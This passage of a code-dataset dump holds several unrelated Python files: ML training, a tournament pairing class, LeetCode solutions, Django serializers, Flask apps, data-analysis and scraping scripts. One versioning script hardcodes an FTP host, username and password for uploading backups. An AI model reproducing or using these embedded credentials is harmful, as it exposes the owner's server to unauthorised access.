       train_resampled_neg.shape[0]), \"are not.\")\r\n\r\n    X_train_resampled = train_resampled_neg.append(train_resampled_pos).iloc[:, :-1]\r\n    y_train_resampled = train_resampled_neg.append(train_resampled_pos).iloc[:, -1]\r\n    if not oversample:\r\n        return X_train_resampled, y_train_resampled\r\n    else:\r\n        
X_train_resampled_oversampled, y_train_resampled_oversampled = SMOTE(kind='borderline1').fit_sample(\\\r\n X_train_resampled, y_train_resampled)\r\n return X_train_resampled_oversampled, y_train_resampled_oversampled\r\n\r\ndef main():\r\n \"\"\"\r\n Train random forest classifier\r\n 1. Create freatures\r\n 2. Split dataset to train/test\r\n 3. Resample data (both undersampling and oversampling)\r\n 4. Train the model\r\n 5. Show test results\r\n \"\"\"\r\n # Split training set and test set.\r\n # Training set is undersanmpled and oversampled. Check function 'resampleTraining'\r\n features,features_recent_3month = get_data() # Features (not split yet) from SQL\r\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(\r\n features.iloc[:,1:-1], features.iloc[:, -1], test_size=0.30, random_state=32)\r\n X_train_resampled_oversampled, y_train_resampled_oversampled = resample_training(X_train, y_train, oversample=True)\r\n print(\"Number of sellers in test set is\", str(sum(y_test)), \"and\", str(sum(y_test == 0)), \"are not.\")\r\n\r\n # Train random_forest_classifer by grid_search\r\n rfc = RfcCV()\r\n print(\"Training model using undersample + oversample\")\r\n rfc.train_model(X_train_resampled_oversampled, y_train_resampled_oversampled)\r\n accu, recallscore, f1Score = rfc.evaluate(X_test, y_test)\r\n\r\n # After model train and test, predict the probability of selling in next month\r\n print(str(accu) + \":\" + str(recallscore) + \":\" + str(f1Score))\r\n y_pred_grd = rfc.best_model.predict_proba(features_recent_3month.iloc[:,1:])\r\n features_recent_3month['likelihood']=y_pred_grd[:,1]\r\n print('Weight for each features:')\r\n print(str(rfc.best_model.feature_importances_))\r\n\r\n # Write result to sql database\r\n write_result(features_recent_3month['likelihood'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.stdout = open('output.txt', 'wt')\r\n main()\r\n","sub_path":"src/modelTraining.py","file_name":"modelTraining.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109344939","text":"import random\nfrom FTC.Match import Match\nfrom FTC.Errors import CrossplatformRoundCreationImpossible,UnevenAmountOfTeams,IllegalPlatformsOnSameTeam\n\nclass Round:\n def __init__(self, teams):\n self.teams = teams\n self._buyoutTeams = []\n self._matches = []\n\n\n def _randomMatchesWithTeams(self, teams):\n return_matches = []\n for _ in range(0, len(teams), 2):\n team1 = teams[random.randint(0, len(teams) - 1)]\n teams.remove(team1)\n team2 = teams[random.randint(0, len(teams) - 1)]\n teams.remove(team2)\n\n match = Match(team1, team2)\n return_matches.append(match)\n return return_matches\n\n def createMatches(self, numOfBuyoutTeams=0, crossplatform_filter=False):\n if ((len(self.teams) - numOfBuyoutTeams) % 2 != 0):\n raise UnevenAmountOfTeams()\n\n if (crossplatform_filter):\n pcTeams = []\n xboxTeams = []\n ps4Teams = []\n for team in self.teams:\n if team.hasPS4 and team.hasXBOX:\n raise IllegalPlatformsOnSameTeam()\n elif team.hasXBOX:\n xboxTeams.append(team)\n elif team.hasPS4:\n ps4Teams.append(team)\n else:\n pcTeams.append(team)\n\n if (len(ps4Teams) == 0):\n teamsToPick = pcTeams + xboxTeams\n matches = self._randomMatchesWithTeams(teamsToPick)\n self._matches = matches\n else:\n if ((len(ps4Teams) + len(pcTeams)) % 2 != 0):\n raise CrossplatformRoundCreationImpossible()\n elif (len(ps4Teams) % 2 == 0):\n self._matches = self._randomMatchesWithTeams(ps4Teams)\n 
self._matches.extend(self._randomMatchesWithTeams(pcTeams + xboxTeams))\n else:\n pcTeamToBalance = pcTeams[random.randint(0,len(pcTeams)-1)]\n pcTeams.remove(pcTeamToBalance)\n self._matches = self._randomMatchesWithTeams(ps4Teams + [pcTeamToBalance])\n self._matches.extend(self._randomMatchesWithTeams(pcTeams + xboxTeams))\n\n else:\n teamsToPick = self.teams[:]\n for _ in range(numOfBuyoutTeams):\n buyoutTeam = teamsToPick[random.randint(0,len(teamsToPick)-1)]\n teamsToPick.remove(buyoutTeam)\n self._buyoutTeams.append(buyoutTeam)\n\n self._matches.extend(self._randomMatchesWithTeams(teamsToPick))\n\n\n","sub_path":"FTC/Round.py","file_name":"Round.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"345167137","text":"# Leetcode: https://leetcode.com/problems/next-greater-element-i/description/\n\n# You are given two arrays (without duplicates) nums1 and nums2 where nums1’s elements are subset of nums2. Find all the next greater numbers for nums1's elements in the corresponding places of nums2.\n\n# The Next Greater Number of a number x in nums1 is the first greater number to its right in nums2. If it does not exist, output -1 for this number.\n\n# Example 1:\n# Input: nums1 = [4,1,2], nums2 = [1,3,4,2].\n# Output: [-1,3,-1]\n# Explanation:\n# For number 4 in the first array, you cannot find the next greater number for it in the second array, so output -1.\n# For number 1 in the first array, the next greater number for it in the second array is 3.\n# For number 2 in the first array, there is no next greater number for it in the second array, so output -1.\n# Example 2:\n# Input: nums1 = [2,4], nums2 = [1,2,3,4].\n# Output: [3,-1]\n# Explanation:\n# For number 2 in the first array, the next greater number for it in the second array is 3.\n# For number 4 in the first array, there is no next greater number for it in the second array, so output -1.\n# Note:\n# All elements in nums1 and nums2 are unique.\n# The length of both nums1 and nums2 would not exceed 1000.\n\n# Similar as https://leetcode.com/problems/daily-temperatures/, it's to get the first value that is greater than target.\n\n# The idea is that num[i] > num[i+1], then we need to jump to check the number larger than num[i+1]\n\nclass Solution(object):\n def nextGreaterElement(self, findNums, nums):\n \"\"\"\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n valOffSet = [0] * len(nums)\n for i in xrange(len(nums) - 2, -1, -1):\n nextI = i+1\n while nums[i] > nums[nextI]:\n if valOffSet[nextI] == 0:\n nextI = i\n break\n else:\n nextI += valOffSet[nextI]\n valOffSet[i] = nextI - i\n \n rs = []\n for num in findNums:\n i = nums.index(num)\n if valOffSet[i]:\n rs.append(nums[i + valOffSet[i]])\n else:\n rs.append(-1)\n return rs","sub_path":"NextGreaterElementI.py","file_name":"NextGreaterElementI.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277120442","text":"import heapq\n\n\nclass Solution:\n\n def minMeetingRooms(self, intervals) -> int:\n heap = [] # heaps are simply priority queues\n intervals.sort()\n for start_time, end_time in intervals:\n heapq.heappush(heap, end_time)\n if start_time >= heap[0]:\n heapq.heappop(heap)\n return len(heap)\n\n\ndef main():\n tests = [[[0, 30], [5, 10], [15, 20]],\n [[4, 16], [5, 17], [4, 17], [12, 17]],\n [[6, 15], [13, 20], [6, 17]],\n [[16, 22], [28, 45], [3, 
9], [46, 50], [13, 14]],\n [[1, 5], [8, 9], [8, 9]],\n [[20, 45], [12, 13], [2, 50], [14, 20], [3, 5]]]\n for test in tests:\n ret = Solution().minMeetingRooms(test)\n print(ret)\n\n\nif __name__ == '__main__':\n main()","sub_path":"P0253_Meeting_Rooms_2.py","file_name":"P0253_Meeting_Rooms_2.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350055809","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass DigitalProfileSerializer(serializers.HyperlinkedModelSerializer):\n id = serializers.ReadOnlyField()\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:editdigitalprofile-detail\") # CALL JOB DETAIL ROUTER\n\n class Meta:\n model = DigitalProfile\n fields = ['url', 'id', 'user', 'company_name', 'company_logo']\n\n\nclass DigitalProfileMiniSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = DigitalProfile\n fields = ['id']\n\n\nclass EditDigitalProfileSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n company_name = serializers.ReadOnlyField()\n approved = serializers.ReadOnlyField()\n\n class Meta:\n model = DigitalProfile\n fields = '__all__'\n\n\nclass PersonalDetailSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditpersonaldetail-detail\")\n\n class Meta:\n model = PersonalDetail\n fields = '__all__'\n\n\nclass SocialMediaLinksSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditsocialmedialinks-detail\")\n\n class Meta:\n model = SocialMediaLinks\n fields = '__all__'\n\n\nclass PaymentDetailSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditpaymentdetail-detail\")\n\n class Meta:\n model = PaymentDetail\n fields = '__all__'\n\n\nclass ServicesSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditservices-detail\")\n\n class Meta:\n model = Services\n fields = '__all__'\n\n\nclass EcommerceSerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditecommerce-detail\")\n\n class Meta:\n model = Ecommerce\n fields = '__all__'\n\n\nclass GallerySerializer(serializers.HyperlinkedModelSerializer):\n digital_profile = DigitalProfileMiniSerializer(read_only=True)\n user = serializers.ReadOnlyField(source='user.username')\n url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:viewaddeditgallery-detail\")\n\n class Meta:\n model = Gallery\n fields = '__all__'\n\n\nclass 
ApproveDigitalProfileSerializer(serializers.HyperlinkedModelSerializer):\n    user = serializers.ReadOnlyField(source='user.username')\n    url = serializers.HyperlinkedIdentityField(view_name=\"digitalprofile:approvedigitalprofiledetail-detail\")\n    company_name = serializers.ReadOnlyField()\n\n    class Meta:\n        model = DigitalProfile\n        fields = '__all__'\n\n\nclass ApproveDigitalProfileDetailSerializer(serializers.ModelSerializer):\n    user = serializers.ReadOnlyField(source='user.username')\n    company_name = serializers.ReadOnlyField()\n\n    class Meta:\n        model = DigitalProfile\n        fields = ['user', 'company_name', 'date', 'approved']\n","sub_path":"digitalprofile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"327322807","text":"#******************************** Run notes *******************************\n# Must be run after Build_Data_Dictionary.py to build the pickle file of data.\n# Calculates the average temperature at each tree over the 30 seconds prior to the first event\n# and saves the data as a .csv file in the ../2_Data/Repeatibility_Data/ folder.\n# Uses vent_info.csv to determine the ventilation profile for each experiment.\n\n\nimport pandas as pd\nimport os\nimport datetime as datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\ndata_location = '../2_Data/'\nevents_location = '../3_Info/Events/'\n\nchannel_list = pd.read_csv('../3_Info/Channels.csv').set_index('Channel')\nchannels_grouped = channel_list.groupby('Primary_Chart')\n\nvent_info = pd.read_csv('../3_Info/Vent_Info.csv')\n\nexp_des = pd.read_csv('../3_Info/Description_of_Experiments.csv').set_index('Experiment')\n\nchannels_to_skip = {}\n\nfor exp in exp_des.index.values:\n\tchannels_to_skip[exp] = exp_des['Excluded Channels'][exp].split('|')\n\n#Read in pickle file for data\nall_exp_data = pickle.load( open( data_location + 'all_exp_data.dict', 'rb' ) )\nall_exp_events = pickle.load( open (events_location + 'all_exp_events.dict', 'rb'))\n\nprint (all_exp_events['Experiment_2_Events'])\n# -------------------------------Calculate and output Repeatibility Data-------------------------------\nrunning_comp = {}\n\noutput_location = '../2_Data/Repeatibility_Data'\n\nfor vent in vent_info.columns:\n\n\tfor exp in vent_info[vent].dropna():\n\n\t\tif vent not in running_comp:\n\t\t\trunning_comp[vent] = {}\n\n\t\tif exp not in running_comp[vent]:\n\t\t\trunning_comp[vent][exp] = pd.DataFrame()\n\n\t\tif exp == 'Experiment_1_Data':\n\t\t\tfirst_event = all_exp_events[exp[:-4] + 'Events']['Time_Seconds'].ix[1]\n\t\telse:\n\t\t\tfirst_event = all_exp_events[exp[:-4] + 'Events']['Time_Seconds'].ix[2]\n\n\t\trunning_comp[vent][exp] = all_exp_data[exp].ix[first_event-30:first_event]\t\n\nrepeatability_data = {}\n\nif not os.path.exists(output_location):\n\tos.makedirs(output_location)\n\nfor vent in vent_info.columns.values:\n\n\tif vent not in repeatability_data:\n\t\trepeatability_data[vent] = {}\n\n\tfor exp in vent_info[vent].dropna():\n\t\tprint (exp)\n\n\t\tfor channel_group in channels_grouped.groups:\n\n\t\t\tif channel_list['Type'][channels_grouped.get_group(channel_group).index.values[0]] != 'Temperature':\n\t\t\t\tcontinue\n\n\t\t\tif 'Skin' in channel_group:\n\t\t\t\tcontinue\n\n\t\t\tgroup_values = pd.DataFrame()\n\n\n\t\t\tfor channel in channels_grouped.get_group(channel_group).index.values:\n\n\t\t\t\tif channel not in running
_comp[vent][exp].keys():\n\t\t\t\t\tcontinue \n\n\t\t\t\tif channel in channels_to_skip.get(exp, []):\n\t\t\t\t\tcontinue\n\n\t\t\t\tvalue = pd.DataFrame(running_comp[vent][exp][channel])\n\n\t\t\t\tgroup_values = pd.concat([group_values, value], axis =1)\n\n\t\t\tgroup_values = group_values.mean(axis=1)\n\n\t\t\tif exp not in repeatability_data[vent]:\n\t\t\t\trepeatability_data[vent][exp] = {}\n\n\t\t\trepeatability_data[vent][exp][channel_group]=group_values.mean()\n\n\trepeatability_data_csv = pd.DataFrame.from_dict(repeatability_data[vent])\n\trepeatability_data_csv = repeatability_data_csv.reset_index()\n\trepeatability_data_csv.rename(columns={'index':'Location'}, inplace=True)\n\n\tdata_types = []\n\tfor location in repeatability_data_csv['Location']:\n\t\tif 'Temps' in location:\n\t\t\tdata_types = data_types + ['Temperature']\n\t\telif 'HF' in location:\n\t\t\tdata_types = data_types + ['Heat Flux']\n\t\telif 'Carbon' in location:\n\t\t\tdata_types = data_types + ['Carbon Monoxide']\n\t\telif 'CO2' in location:\n\t\t\tdata_types = data_types + ['Carbon Dioxide']\n\t\telif 'O2' in location:\n\t\t\tdata_types = data_types + ['Oxygen']\n\n\trepeatability_data_csv['Type'] = data_types\n\n\trepeatability_data_csv.to_csv(output_location + '/' + vent + '.csv', index=False)\n\n\tprint ('------------------' + vent + '.csv saved in ' + output_location + '------------------')\n","sub_path":"Part_II/1_Scripts/Calculate_Repeatibility_Data.py","file_name":"Calculate_Repeatibility_Data.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"229754751","text":"# Required imports\nimport json\n\nimport aurora\n\ndef handler(event, context):\n    print(f\"function executed with context: {context}\")\n    #print(f\"function executed with event: {event}\")\n    response = aurora.simple_call_rds_data_api(\"select sName, sID, description, pic, picCounter from shows where sID=1\", parameters=None)\n    response = aurora.to_python_dict(response)\n    if event[\"resolve\"] == \"query.getShow\":\n        response = response[0]\n    elif event[\"resolve\"] == \"mutation.deleteShow\":\n        response = {'sID': \"100\", 'sName': \"fake delete\", 'description': 'this is fake to test functionality'}\n\n    return response\n\n\n","sub_path":"src/functions/dummyfunction_src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"386881931","text":"'''\nAPI for the agendas app\n'''\nimport tastypie.fields as fields\nfrom avatar.templatetags.avatar_tags import avatar_url\nfrom django.contrib.auth.models import User\n\nfrom knesset.agendas.models import Agenda, AgendaVote\nfrom knesset.api.resources.base import BaseResource\nfrom knesset.mks.models import Member, Party\n\n\nclass UserResource(BaseResource):\n    class Meta(BaseResource.Meta):\n        queryset = User.objects.all()\n        include_absolute_url = True\n        include_resource_uri = False\n        allowed_methods = ['get']\n        fields = ['username']\n\n    avatar = fields.CharField()\n\n    def dehydrate_avatar(self, bundle):\n        return avatar_url(bundle.obj, 48)\n\n\nclass AgendaVoteResource(BaseResource):\n    class Meta(BaseResource.Meta):\n        queryset = AgendaVote.objects.select_related()\n        allowed_methods = ['get']\n\n    title = fields.CharField()\n\n    def dehydrate_title(self, bundle):\n        return bundle.obj.vote.title\n\n\nclass AgendaTodoResource(BaseResource):\n    class Meta(BaseResource.Meta):\n        allowed_methods = ['get']\n        query
set = Agenda.objects.all()\n        resource_name = 'agenda-todo'\n        fields = ['votes_by_controversy', 'votes_by_agendas']\n\n    votes_by_controversy = fields.ListField()\n    votes_by_agendas = fields.ListField()\n\n    # TODO: Make this a parameter or setting or something\n    NUM_SUGGESTIONS = 10\n\n    def dehydrate_votes_by_agendas(self, bundle):\n        votes = bundle.obj.get_suggested_votes_by_agendas(\n            AgendaTodoResource.NUM_SUGGESTIONS)\n        return self._dehydrate_votes(votes)\n\n    def dehydrate_votes_by_controversy(self, bundle):\n        votes = bundle.obj.get_suggested_votes_by_controversy(\n            AgendaTodoResource.NUM_SUGGESTIONS)\n        return self._dehydrate_votes(votes)\n\n    def _dehydrate_votes(self, votes):\n        def dehydrate_vote(vote):\n            return dict(id=vote.id,\n                        url=vote.get_absolute_url(),\n                        title=vote.title,\n                        score=vote.score)\n        return [dehydrate_vote(v) for v in votes]\n\n\nclass AgendaResource(BaseResource):\n    ''' Agenda API '''\n\n    members = fields.ListField()\n    parties = fields.ListField()\n    votes = fields.ListField()\n    editors = fields.ListField()\n\n    class Meta(BaseResource.Meta):\n        queryset = Agenda.objects.filter(\n            is_public=True).prefetch_related('agendavotes__vote', 'editors')\n        allowed_methods = ['get']\n        include_absolute_url = True\n        excludes = ['is_public']\n        list_fields = ['name', 'id', 'description', 'public_owner_name']\n\n    def dehydrate_members(self, bundle):\n        mks_values = dict(bundle.obj.get_mks_values())\n        members = []\n        for mk in Member.objects.filter(pk__in=mks_values.keys()).select_related('current_party'):\n            # TODO: this sucks, performance wise\n            current_party = mk.current_party\n            members.append(dict(\n                name=mk.name,\n                score=mks_values[mk.id]['score'],\n                rank=mks_values[mk.id]['rank'],\n                volume=mks_values[mk.id]['volume'],\n                absolute_url=mk.get_absolute_url(),\n                party=current_party.name,\n                party_url=current_party.get_absolute_url(),\n            ))\n\n        return members\n\n    def dehydrate_parties(self, bundle):\n        return [\n            dict(name=x.name, score=bundle.obj.party_score(x),\n                 absolute_url=x.get_absolute_url())\n            for x in Party.objects.prefetch_related('members')\n        ]\n\n    def dehydrate_votes(self, bundle):\n        return [\n            dict(title=v.vote.title, id=v.id, importance=v.importance,\n                 score=v.score, reasoning=v.reasoning)\n            for v in bundle.obj.agendavotes.select_related()\n        ]\n\n    def dehydrate_editors(self, bundle):\n        return [\n            dict(absolute_url=e.get_absolute_url(), username=e.username,\n                 avatar=avatar_url(e, 48))\n            for e in bundle.obj.editors.all()\n        ]\n","sub_path":"src/knesset/agendas/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"162475689","text":"from flask import Flask, request, url_for, render_template, redirect\n\napp = Flask(__name__)\n\n@app.route('/login/')\ndef login():\n    return 'Login page'\n\n@app.route('/profile/')\ndef profile():\n    if request.args.get('name'):\n        return 'Profile page'\n    else:\n        return redirect(url_for('login',_external=True), code=302)\n\n\n\n\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"473155384","text":"import copy\nimport queue\n\nP1 = [41,33,20,32,7,45,2,12,14,29,49,37,6,11,39,46,47,38,23,22,28,10,36,35,24]\nP2 = [17,4,44,9,27,18,30,42,21,26,16,48,8,15,34,50,19,43,25,1,13,31,3,5,40]\n\neasyP1 = [9,2,6,3,1]\neasyP2 = [5,8,4,7,10]\n\n# ran it on the school's com
puter up to about 63 billion iterations with no result, so you\n# really have to think it through / it can be solved in a smarter way...\n# Why is 44 missing??\n\nq1 = queue.Queue()\nq2 = queue.Queue()\n\ndef round():\n    v1 = q1.get()\n    v2 = q2.get()\n    if(v1 > v2):\n        q1.put(v1)\n        q1.put(v2)\n    elif(v2 > v1):\n        q2.put(v2)\n        q2.put(v1)\n    else:\n        print(\"ERROR, same value...\")\n\nfor i in range(len(P1)):\n    q1.put(P1[i])\nfor i in range(len(P2)):\n    q2.put(P2[i])\n\n\ndef printqueues():\n    vals = []\n    print(\"q1: \")\n    while(not(q1.empty())):\n        tmp = q1.get()\n        vals.append(tmp)\n        print(tmp, end = ', ')\n    print()\n    print(\"q2: \")\n    while(not(q2.empty())):\n        tmp = q2.get()\n        vals.append(tmp)\n        print(tmp, end = ', ')\n    print()\n    return vals\n\niterationnum = 0\nwhile(not(q1.empty() or q2.empty())):\n    round()\n\n\nprint(\"When done:\")\nfinalvals = printqueues()\n\nres = 0\nfor i in range(len(finalvals)):\n    res += (len(finalvals)-i)*finalvals[i]\n\nprint(\"which gives: \", res)\n","sub_path":"adventofcode.cpp/2020/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"487816436","text":"from fastapi.testclient import TestClient\n\nfrom app import app\n\nclient = TestClient(app)\n\n\ndef test_extract_text():\n    URL = \"http://google.com\"\n    response = client.get(\"/extract_text/?URL={}\".format(URL))\n    print(response.json())\n\ndef test_add_site():\n    URL = \"http://google.com\"\n    response = client.get(\"/extract_text/?URL={}\".format(URL))\n    print(response.json())\n\n\nif __name__ == \"__main__\":\n    test_extract_text()\n","sub_path":"backend/TestSite.py","file_name":"TestSite.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"15292622","text":"import sys\nif sys.version_info[0]<3:\n    raise Exception(\"REQUIRES PYTHON 3\")\n\nimport ftplib\nimport glob\nimport os\n#import urllib.request\nimport zipfile\nimport time\nfrom changelog import *\n\ndef versionBundle():\n    \"\"\"compress ../* into a zip with a filename according to the time.\"\"\"\n    foldersToIgnore=[\"versions\",\"__pycache__\"]\n    def zipdir(path, zip):\n        basepath=path\n        for root, dirs, files in os.walk(path):\n            for file in files:\n                if os.path.basename(root) in foldersToIgnore:\n                    continue #IGNORE BACKUPS\n                elif \".pyc\" in file:\n                    continue #IGNORE COMPILED FILES\n                else:\n                    absPath=os.path.join(root, file)\n                    relPath=absPath.replace(basepath,\"\")\n                    zip.write(absPath,relPath)\n    fname=\"Scan-A-Gator \"\n    fname+=time.strftime(\"%y.%m.%d %H.%M\",time.localtime())\n    if os.path.exists(\"C:/computername.txt\"):\n        with open(\"C:/computername.txt\") as f:\n            fname+=\" \"+f.read().strip()\n    fname=\"./versions/\"+fname+\".zip\"\n    if not os.path.exists('./versions/'):\n        os.mkdir('./versions')\n    print(\"ZIPPING TO:\",fname)\n    zipf = zipfile.ZipFile(fname, 'w', zipfile.ZIP_DEFLATED)\n    zipdir(os.path.abspath(\"../\"), zipf)\n    zipf.close()\n    print(\"DONE\")\n\ndef versionUpload():\n    \"\"\"upload the most recent compressed version to the internet.
\"\"\"\n fname=sorted(glob.glob(\"./versions/*.zip\"))[-1]\n print('uploading \"%s\" ...'%fname)\n username='swhardenbackup'\n password='makeBackups13!'\n session = ftplib.FTP('ftp.swharden.com',username,password)\n session.cwd(\"SAG\")\n file = open(fname,'rb')\n session.storbinary('STOR '+os.path.basename(fname), file)\n file.close()\n\n file = open('changelog.html','rb')\n session.storbinary('STOR '+'changelog.html', file)\n file.close()\n\n print(\"DONE\")\n session.quit()\n\nif __name__ == \"__main__\":\n updateCangelog()\n versionBundle()\n input(\"\\n\\npush ENTER to upload this version ...\")\n versionUpload()\n input(\"DONE\")","sub_path":"two-photon/software/linescan-analysis/scan-a-gator-3.56/distutils/SHversion.py","file_name":"SHversion.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"504106290","text":"import logging.handlers\nimport os\nimport platform\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.contrib.cache import MemcachedCache\n\napp = Flask(__name__)\nif os.environ.get(\"YOUCAI_WEB_CONFIG\"):\n app.config.from_envvar('YOUCAI_WEB_CONFIG')\nelse:\n app.config.from_pyfile(\"/data/config/youcai_contest.py\")\n\n# logger\n\nhostname = platform.node()\n\nlogger = logging.getLogger('youcai')\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n hostname + \" youcai [%(levelname)s] %(asctime)s %(funcName)s %(lineno)d %(message)s\")\n\nif app.config['STAGE'] == 'DEV':\n # debug handler\n rh_debug = logging.handlers.RotatingFileHandler(filename=app.config['LOG_PATH'] + 'youcai_flask_debug.log',\n maxBytes=1024 * 1024 * 1024,\n backupCount=20)\n rh_debug.setFormatter(formatter)\n rh_debug.setLevel(logging.DEBUG)\n\n # stream handler\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.DEBUG)\n\n logger.addHandler(rh_debug)\n logger.addHandler(sh)\nelse:\n # error handler\n rh_error = logging.handlers.RotatingFileHandler(filename=app.config['LOG_PATH'] + 'youcai_flask_error.log',\n maxBytes=1024 * 1024 * 1024,\n backupCount=20)\n rh_error.setFormatter(formatter)\n rh_error.setLevel(logging.ERROR)\n\n logger.addHandler(rh_error)\n\ndb = SQLAlchemy(app)\n\nmem_cache = MemcachedCache(app.config['MEMCACHE_ADDRESS'])\n\nfrom application.utils.loginHelper import ContestLoginHelper, AdminLoginHelper\n\n\ndef _contest_user_context_processor():\n return dict(current_contest_user=ContestLoginHelper._get_user())\n\n\ndef _admin_user_context_processor():\n return dict(current_admin_user=AdminLoginHelper._get_user())\n\n\napp.context_processor(_contest_user_context_processor)\napp.context_processor(_admin_user_context_processor)\n\nfrom controller.test import test\nfrom controller.index import index\nfrom controller.contest import contest\nfrom controller.ucenter import ucenter\nfrom controller.admin import admin\n\napp.register_blueprint(test)\napp.register_blueprint(index)\napp.register_blueprint(contest)\napp.register_blueprint(ucenter)\napp.register_blueprint(admin)\n","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317895526","text":"from flask import jsonify, request, abort, session\n\nfrom . import api\nfrom .errors import ValidationError, forbidden, not_found\nfrom .. 
import db\nfrom ..models import User\n\n\n@api.route('/users/login', methods=['POST'])\ndef add_user():\n new_user = User.from_json(request.json)\n user = User.query.filter_by(uuid=new_user.uuid).first()\n if user is None:\n db.session.add(new_user)\n db.session.commit()\n response = jsonify({'code': 2001, 'message': 'add user success'}), 200\n else:\n user.ping()\n response = jsonify({'code': 2002, 'message': 'welcome back'}), 200\n session['uuid'] = new_user.uuid\n return response\n\n\n@api.route('/users/uuid/')\ndef get_users_info(uuid):\n if 'uuid' in session:\n user = User.query.filter_by(uuid=uuid).first()\n if user is None:\n abort(404)\n else:\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n else:\n return forbidden('you have yet not login')\n\n\n@api.route('/users/id/')\ndef get_user(id):\n if 'uuid' in session:\n user = User.query.get(id)\n if user is None:\n return not_found('not found')\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n return forbidden('you have yet not login')\n\n\n@api.route('/users/')\ndef get_users():\n if 'uuid' in session:\n user = User.query.filter_by(uuid=session['uuid']).first()\n return jsonify({'code': 2001, 'message': 'success', 'users': user.to_json()}), 200\n else:\n return forbidden(\"you have yet not login\")\n\n\n@api.route('/users/update', methods=['PUT'])\ndef update_user():\n if 'uuid' in session:\n update_data = request.json\n if update_data is None:\n raise ValidationError('request data does not have a request body')\n else:\n uuid = session['uuid']\n user = User.query.filter_by(uuid=uuid).first()\n nick_name = update_data.get('nickName')\n avatar_url = update_data.get('avatarUrl')\n if nick_name is None and avatar_url is None \\\n or nick_name == user.nick_name or avatar_url == user.avatar_url:\n return jsonify({'code': 2003, 'message': 'does not update anything'})\n if nick_name is not None and nick_name != '':\n user.reset_nickname(uuid, nickname=nick_name)\n if avatar_url is not None and avatar_url != '':\n user.reset_avatar(uuid, avatar_url=avatar_url)\n return jsonify({'code': 2004, 'message': 'update info success', 'users': user.to_json()}), 200\n else:\n return forbidden('you have yet not login')\n","sub_path":"app/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195875490","text":"import os\n\nimport requests\nimport re\n\n\n# 发请求\nsession = requests.session()\n\n# 获取响应并解析\nres = session.get(\"http://www.woniuxy.com/note\")\ncontent = res.text\n# print(content)\n\n# 定义匹配规则\n# regular = '= 0.95)+1 #95 가능범위 확인\n#print(\"cumsum >= 0.99\", cumsum >= 0.99)\nprint(\"d : \", 